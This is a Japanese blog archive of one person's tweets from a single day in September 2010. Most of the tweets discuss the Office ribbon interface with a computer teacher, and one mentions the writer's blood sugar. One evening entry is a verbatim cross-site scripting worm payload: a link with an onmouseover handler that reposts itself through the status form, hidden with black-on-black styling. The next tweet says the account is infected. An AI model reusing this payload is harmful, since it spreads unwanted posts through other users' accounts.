Hinemos: Recent

あある の どくはく

9月21日(火)のつぶやき

2010-09-22 | tweet
10:14 from web
なーんかほとんど当てはまってるんですけどw QT @kinokuniyabunza 脳に悪い7つの習慣 http://amzn.to/alnd89
11:02 from web
そうなんですか?同じ種類使えると思ってたんですが・・・Wordでの図形作成は面倒なのでExcelで作って貼り付けることしばしばです QT @pc_fukuno 図形の枠線にはない線の種類が、罫線の方にあり、その線と同じ種類を使いたい場合は、罫線で四角形を作成することになります。
13:02 from web
昨日から血糖値が下がらない(T_T)高止まりする理由はないはずなのになー 下げる努力もしていないけどw
13:10 from web (Re: @pc_fukuno
@pc_fukuno 失礼しました。ずっと低いバージョンので確認してQTしてしまいましたm(_ _)m Word2010の罫線はいろいろあるんですね(持ってないので確認できません・・)。でも罫線で四角形書くのはけっこー厄介ですねぇ・・・
13:11 from web (Re: @pc_fukuno
@pc_fukuno せっかくの機会なので、ぜひお伺いしたいことがあります。office2007以降に対する生徒さんたちの反応はいかがなものでしょうか?それまでのversionを使用していた者からはリボン形式は大不評!!なのですが、初めて触られる方なら入りやすいのかなと。
13:13 from web (Re: @pc_fukuno
@pc_fukuno 個人的にもリボン形式にはまだ戸惑うことがあります。(併用しているからかもですが。)操作性もかなり変わったかと思いますが、教えやすさの面ではいかがですか。
15:01 from web (Re: @pc_fukuno
@pc_fukuno なるほど~ ご丁寧な回答ありがとうございました。さすが現場の先生ですね。生徒さんが羨ましいです。やはり初心者にはリボン形式が使いやすいというのはホントだったんですね(メーカーの自己満足ではなく)。
15:03 from web
なるほど、同じことをしようとしないことがコツ、と。って、それは難しいですね; QT @pc_fukuno 古い機能を新しい方で真似しようとしたときは戸惑いました。こちらでは、新しい機能をあまり多くは使っておりませんが、基本操作を教えるときは2007以降の方が楽なことが多いです。
15:05 from web
これは知りませんでした。てゆか2010使ったことがなかった; そうですか、ファイルボタンあるんですね。確かにあれが最大のネックですね。QT @pc_fukuno 2010には、2003と同じ「ファイル」ボタンがあるからではないかと思っております。
15:07 from web (Re: @pc_fukuno
@pc_fukuno それにしても、やはり使い勝手がかなり違うとのこと。新しい生徒さんがどういった環境でofficeを使いたいのかによってverが変わってくるというのは、教える側にとっては悩みの種なのではないでしょうか。ありがとうございました、これからもご活躍を期待しています。
21:29 from web
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
21:32 from web
感染してます
by aal_es on Twitter